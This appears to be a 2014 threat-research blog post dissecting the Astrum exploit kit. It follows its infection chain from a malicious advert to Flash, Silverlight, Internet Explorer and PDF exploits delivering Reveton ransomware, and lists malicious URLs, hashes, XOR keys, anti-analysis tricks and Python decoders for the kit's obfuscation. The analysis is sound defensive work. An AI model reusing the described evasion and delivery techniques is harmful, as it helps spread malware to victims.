2014-09-14 - Study
Say Hello to Astrum EK
Artist’s impression shows the structure of the Milky Way NASA/JPL-Caltech/ESO/R. Hurt |
I was chasing something else (the Sweet Orange thread of the Kovter adfraud operation; Kovter has not been ransomware since at least March 2014) when I received bullets from an undocumented "weapon": an exploit kit that seems to be private (for now?) and that, judging by the infection path (an Adxpansion malicious advert on a porn website leading to an https goo.gl link to the landing), is used by a group that was previously sending traffic to the Reveton team's EK threads (so via Cool, then Angler EK):
Say Hello to Astrum EK
Astrum EK 2014-09-06 - real name (not chosen by me). A quick look at the URI pattern may make it look a little Angler-ish... but it isn't. |
Astrum serves a landing only once per IP and also refuses connections from Tor and (at least) Russia.
The lifetime of a landing seems a little longer than on Angler or Nuclear Pack, but where those kits usually require you to fake a referer to avoid being rejected, Astrum does the opposite: show a referer and you get ignored and IP-banned. Firefox, Chrome and Opera are also ignored (and I guess they are filtered out upstream anyway).
A fast search suggests it has been in use since at least 2014-08-15.
Now let's take a look at the bullets and the ballistic.
CVE-2014-0515 - CVE-2013-0634 (Flash) :
These days it is the most successfully targeted vulnerability in exploit kits, followed by CVE-2013-2551.
CVE-2014-0515 successful path in Astrum EK 2014-09-06 |
GET http://static.yarkiy-mir .org/duf5ibqshp.html
200 OK (text/html)
Piece of Astrum's Landing 2014-09-06 http://pastebin.com/Jc5k0kvi JsBeautified : http://pastebin.com/gvjskkG2 |
Obfuscation in use, as described by EKWatcher:
An array of modified Base64 strings, each XORed with a different byte and then inserted (in random order) into the JS later. The Base64 alphabet is "A-Za-z0-9-:" instead of "A-Za-z0-9+/".
After deobfuscating the "div" value via the function t (using Malzilla for instance) we get this:
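As an added illustration (not code from the post or from the kit), here is a decoder for that scheme in Python: it maps the "A-Za-z0-9-:" alphabet back to standard Base64, XORs the result with the per-string byte, and recovers that byte by brute force using common JavaScript tokens as a marker. The decode-then-XOR order, the padding handling and the marker list are assumptions, and the sample string is constructed.

```python
import base64
import string
from typing import Optional

# Standard alphabet and the Astrum variant: '-' replaces '+' and ':' replaces '/'.
STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
ASTRUM_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "-:"
TO_STD = str.maketrans(ASTRUM_ALPHABET, STD_ALPHABET)
TO_ASTRUM = str.maketrans(STD_ALPHABET, ASTRUM_ALPHABET)

# Tokens a decoded fragment of landing JavaScript is likely to contain
# (analyst heuristic for key recovery; an assumption, not taken from the kit).
MARKERS = (b"function", b"document", b"var ", b"eval(")


def astrum_decode(blob: str, key: int) -> bytes:
    """Map the custom alphabet back to standard Base64, decode, then XOR every
    byte with the per-string key (decode-then-XOR order is an assumption about t)."""
    std = blob.translate(TO_STD)
    raw = base64.b64decode(std + "=" * (-len(std) % 4))   # restore stripped padding
    return bytes(b ^ key for b in raw)


def astrum_encode(data: bytes, key: int) -> str:
    """Inverse of astrum_decode; only used to build the constructed sample below."""
    xored = bytes(b ^ key for b in data)
    return base64.b64encode(xored).decode("ascii").rstrip("=").translate(TO_ASTRUM)


def recover_key(blob: str) -> Optional[int]:
    """Brute-force the single XOR byte. A wrong key alters every output byte, so a
    marker string is very unlikely to show up under any key but the real one."""
    for key in range(256):
        if any(m in astrum_decode(blob, key) for m in MARKERS):
            return key
    return None


# Constructed sample: one JavaScript statement protected Astrum-style with key 0x5A.
SAMPLE_PLAIN = b"var e=document.createElement('div');e.innerHTML=s;"
SAMPLE_KEY = 0x5A
SAMPLE_BLOB = astrum_encode(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    print(SAMPLE_BLOB)
    print(recover_key(SAMPLE_BLOB), astrum_decode(SAMPLE_BLOB, SAMPLE_KEY))
```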
There are sweet pieces of code like these, showing they had researchers, bots, etc. in mind while writing it:
On landing load, the script tries to detect debugging tools (even phantom...). |
It also checks via loadXML whether obvious researcher tools are running or whether it's running in a VM. |
Check for Kaspersky BHO |
And here is the data that will be posted:
Quick sum-up of the data that will be encoded and posted in the next call. Comments are obviously not in the original code |
POST http://static.yarkiy-mir .org/IVmTAccT_rdKYvlrrCSb3UJl-G-gc5uJSzOmaP8jldlPMKNo_iuSh1J_qjr5Ot7fTg..
200 OK (text/html) CVE-2013-2551 and creation of the Flash object.
Posted data (as Neutrino was doing):
Astrum - 2014-09-06 Piece of the Post Call reply. |
The obfuscation in use is the same as in the landing.
Once decoded, here is the Flash insertion:
Astrum - Inserting the flash element. http://pastebin.com/GYehkmaC |
GET http://static.yarkiy-mir .org/kZThMKU15rv6r4tazgKD0fKoil7CVYOF-_7UWZ0FjdX__dFZnA2Ki-Ky2AWYHMbT_g..
200 OK (application/x-shockwave-flash) 3fb2c3750d51268781fa608a42c3e4d7 CVE-2014-0515 & CVE-2013-0634 (Thanks to Arseny Levin (Spiderlabs) for the help)
GET http://static.yarkiy-mir .org/CjJXSImjvethCT0i4pTYgWkOPCbuw9jVYFhiIbGT1oVkW2chsJvR23kUbn27ip2DZQ..
200 OK (application/octet-stream) Once Decoded: 9d9eb3ceffd6596ebdf7fc9387cd5cb1 - Reveton
Xored Payload. Key : 98EB68248A2815474CFE8902C0603770 |
Astrum EK - 2014-09-06 Silverlight Successful path |
GET http://asset.yur88 .com/xawufyinv3lqr.html
200 OK (text/html)
To give an idea of the data being sent to the exploit kit in the following POST request (md5 is different). |
POST http://asset.yur88 .com/xcC2oZh5Lpbyq4bPox1Hq_uv3M-oGkXzoa_Vy_IaEvr4_IyZokFE_Lbmj5qmUA7-qg..
200 OK (text/html)
The Silverlight call, once decoded:
Astrum - 2014-09-06 Piece of the POST call reply launching the Silverlight and CVE-2013-2551 attack |
Astrum : Post reply silverlight call once decoded 2014-09-06 http://pastebin.com/enPjFN96 |
GET http://asset.yur88 .com/06RCA_viDC7kz3JtwIZlE-3LKG3LgWdLt8shaZGBMELumHg7wdpmRKCCeD_AyyxGvA..
200 OK (application/x-silverlight-app) 3b82c622a343317d14161206aa9f2fce
Silverlight Exploit |
sl.dll : e332a8d62288b80f939fff7d50ac33d3
GET http://asset.yur88 .com/sKJTobP38yWHyWPPiJOaGI7NOc-DlJhA1M0wy9mUz0mNnmmZic-ZT8OEaZ2L3tNN3w..
200 OK (application/octet-stream) 9d9eb3ceffd6596ebdf7fc9387cd5cb1 Reveton again
Xor key : BFAD0475157E8E15F72903B5E80649B2
CVE-2013-2551 :
CVE-2013-2551 successfully fired by Astrum EK 2014-09-11 |
GET http://img.gestionartepyme .com.ar/omhq1t4pjx3fac.html
200 OK (text/html)
POST http://img.gestionartepyme .com.ar/C1BzyerkwKg1aE_30oT_kDU9S6TYgfyXZj0SqIGFqsUzbEzzgNv8w3h2SvLUzeDAZA..
200 OK (text/html)
After a first pass of decoding :
Piece of CVE-2013-2551 after first decoding pass. http://pastebin.com/g847kaSX |
GET http://img.gestionartepyme .com.ar/Wi-S--HJ20lkF67F2ankcWRCqpbTrOd2N0LzmoqosSRiE63Bi_bnIikJq87f4PshNQ..
200 OK (application/octet-stream) a668806b4be0e3b02e3adf0130b70bd0 once decoded (Reveton)
Xor Key: 3FF52A9A6B4C3E3DE93AD7183C0DFFA6
Payload written in %temp%\tmp1.log |
If the lock screen is activated you'll get, for instance in the US:
Reveton - Screen locked - 2014-09-11 US. |
CVE-2014-0322 :
I'll update if I get a successful pass.
GET http://img.gestionartepyme .com.ar/zy6qjw78b3f4vus.html
200 OK (text/html)
POST http://img.gestionartepyme .com.ar/Nly0S9lDj4daNYQm6nfh71U1jCjjc-buCzLSc-Uht-8IbI935Hm07UV6jXDnaq_vWQ..
200 OK (text/html)
I won't put the decoded one ;)
For some reason I couldn't get that one working properly. |
CVE-2014-0322 fired by Astrum But unsuccessful. |
Posted data after the landing, telling the server to try CVE-2014-0322 (md5 is different) |
Obfuscated piece of code to trigger CVE-2014-0322, Astrum 2014-09-11 |
Piece of the Base64-encoded shellcode |
CVE-2010-0188 :
Astrum firing CVE-2010-0188 (and Flash exploit also) 2014-09-11 |
GET http://assets.dance .com.ar/oljm3dz7pnh.html
200 OK (text/html)
Decoded posted data |
POST http://assets.dance .com.ar/ZQc75hcLl-kOZATbKD-u1VpjA4kiO6-GDjgG2itsr4ZcOgeMKzOohBYhAt0pIreBCg..
200 OK (text/html)
Encoded part of the POST reply in charge of the call for CVE-2010-0188, Astrum 2014-09-11 |
Once decoded :
Iframe called for CVE-2010-0188 |
GET http://assets.dance .com.ar/FCNKh1wkpvl_QHW6YxCfxStHcuhpFJ6Wfxx3u2BDnpYtHnbtYByZlGcFcLtiDYaRew..
200 OK (text/html)
Obfuscated : creation of the PDF object |
Deobfuscated call for PDF |
GET http://assets.dance .com.ar/4RkrZSI07MGKehRYHQDV_d59EwoXBNSuiiYWWR5T1K7YJBcPHgzTrJI_ElAfHcypjg..
200 OK (application/x-shockwave-flash) (CVE-2013-0634/2014-0515)
GET http://assets.dance .com.ar/DQT9jPZKYcJmZ8KxyX5Y_jJgxePDelmtZjvAsMotWa00OcHmynJer34ix7DJY0GqYg..
200 OK (application/pdf) CVE-2010-0188 a3aa7a4499e7b89768ee82ea5c3c8b4a
We have the same kind of obfuscation here as in the landing and the POST response.
Object in the PDF containing the Encoded data |
Piece of JS in charge of deobfuscating and triggering the exploit |
GET http://assets.dance .com.ar/jnK3hV3Yt6HlEYi4YuyOnbEWj-po6I_O5U2KuWG_j863T4vvYeCIzP1UjrBv8ZfJ4Q..
200 OK (application/octet-stream)
GET http://assets.dance .com.ar/DqVkvx0HOxZlxluCIjMCKjHBXNAoNwN5ZZpZgyFgA3k3mFjVIT8Ee32DXoMhLht-YQ..
200 OK (application/octet-stream) Decoded : 154a5d50ee032dc32e4c64ecbde0eaa1 Reveton
Note that both payloads (Flash and PDF) in that pass have the same XOR key (919DCE47A3DBD2518B2F1088604AE0DA).
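The 32-hex-character keys quoted with each payload above are 16 bytes, which points to a repeating-key XOR over the downloaded file. As an added example (not the post's or the kit's code), the Python below decodes a payload with a known key and also recovers an unknown key by known plaintext from the expected MZ header, accepting it only if the DOS stub text decodes as well; the header bytes assumed are the usual Microsoft linker values (common, not universal), and the sample payload and key are constructed.

```python
from typing import Optional

# First 16 bytes of a PE produced by Microsoft's linker: "MZ", e_cblp=0x90, e_cp=3,
# e_crlc=0, e_cparhdr=4, e_minalloc=0, e_maxalloc=0xFFFF. Common but not universal,
# so a candidate key is verified against the DOS stub text before being accepted.
MZ_PREFIX = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
DOS_STUB_TEXT = b"This program cannot be run in DOS mode"
KEY_LEN = 16  # the keys quoted in the captions are 32 hex characters, i.e. 16 bytes


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a key repeated every len(key) bytes (encoding and decoding are the same)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_payload(blob: bytes, key_hex: str) -> bytes:
    """Decode with a known key (as quoted in the captions) and sanity-check the result."""
    plain = xor_repeating(blob, bytes.fromhex(key_hex))
    if plain[:2] != b"MZ":
        raise ValueError("decoded data is not a PE image: wrong key or not a PE")
    return plain


def recover_xor_key(blob: bytes) -> Optional[bytes]:
    """Known-plaintext recovery of the 16-byte key: XOR the first 16 ciphertext bytes
    with the expected MZ header, then keep the key only if the DOS stub decodes too."""
    if len(blob) < 0x100:
        return None
    key = xor_repeating(blob[:KEY_LEN], MZ_PREFIX)
    return key if DOS_STUB_TEXT in xor_repeating(blob[:0x100], key) else None


def make_sample_pe() -> bytes:
    """Constructed stand-in for a downloaded payload: DOS header, stub and PE signature."""
    hdr = bytearray(64)
    hdr[:16] = MZ_PREFIX
    hdr[0x3C:0x40] = (0x80).to_bytes(4, "little")  # e_lfanew: PE header at offset 0x80
    stub = b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21" + DOS_STUB_TEXT + b".\r\r\n$"
    body = bytes(hdr) + stub
    return body + bytes(0x80 - len(body)) + b"PE\x00\x00" + bytes(0x200)


SAMPLE_KEY_HEX = "0F1E2D3C4B5A69788796A5B4C3D2E1F0"  # constructed, not one of the page's keys
SAMPLE_PLAIN = make_sample_pe()
SAMPLE_BLOB = xor_repeating(SAMPLE_PLAIN, bytes.fromhex(SAMPLE_KEY_HEX))

if __name__ == "__main__":
    print(recover_xor_key(SAMPLE_BLOB).hex().upper())
```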
No Java ?
This exploit kit had some Java a few weeks ago (CVE-2012-0507, CVE-2013-2460, CVE-2013-2465; if you search for this IP in your logs you might find it), but it seems Java is not exploited anymore.
As I assumed for Flash EK, it's a trade-off: giving up a now small percentage of infections for more stealth (>> the infection chain lasts longer >> fewer rebuilds).
The exploitation graph should be something like:
Astrum EK - Exploitation graph assumption 2014-09-14 |
Files :
AstrumEK_2014-09-14.zip (Owncloud)
PS: If you have some telemetry on this IP, 107.150.24.107, I would be really interested in the numbers. Seeing the infection path, I think the traffic should be quite big.